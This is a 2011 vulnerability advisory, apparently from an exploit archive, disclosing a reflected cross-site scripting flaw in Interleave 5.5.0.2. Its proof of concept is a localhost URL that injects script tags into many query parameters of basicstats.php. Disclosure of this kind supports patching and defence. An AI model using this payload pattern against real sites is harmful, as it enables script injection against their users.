Home / exploits Interleave 5.5.0.2 Cross Site Scripting
Posted on 07 March 2011
------------------------------------------------------------------------ Software................Interleave 5.5.0.2 Vulnerability...........Reflected Cross-site Scripting Threat Level............Low (1/5) Download................http://www.interleave.nl/en/ Release Date............3/3/2011 Tested On...............Windows Vista + XAMPP ------------------------------------------------------------------------ Author..................AutoSec Tools Site....................http://www.autosectools.com/ Email...................John Leitch <john@autosectools.com> ........................Bryce Darling <bryce@autosectools.com> ------------------------------------------------------------------------ --Description-- A reflected cross-site scripting vulnerability in Interleave 5.5.0.2 can be exploited to execute arbitrary JavaScript. --PoC-- http://localhost/interleave-5.5.0.2-stable-20110227/basicstats.php?AjaxHandler=0<script>alert(0)<%2fscript>&e=1<script>alert(0)<%2fscript>&eid=2<script>alert(0)<%2fscript>&id=3<script>alert(0)<%2fscript>&recordid=4<script>alert(0)<%2fscript>&templateid=5<script>alert(0)<%2fscript>&fileid=6<script>alert(0)<%2fscript>&tid=7<script>alert(0)<%2fscript>&username=8<script>alert(0)<%2fscript>&password=9<script>alert(0)<%2fscript>&repository=10<script>alert(0)<%2fscript>&GetCSS=11<script>alert(0)<%2fscript>&GetjQueryUiPlacementJS=12<script>alert(0)<%2fscript>&ShowEntityList=13<script>alert(0)<%2fscript>&ShowTable=14<script>alert(0)<%2fscript>&nonavbar=15<script>alert(0)<%2fscript>&tab=16<script>alert(0)<%2fscript>&CT=17<script>alert(0)<%2fscript>
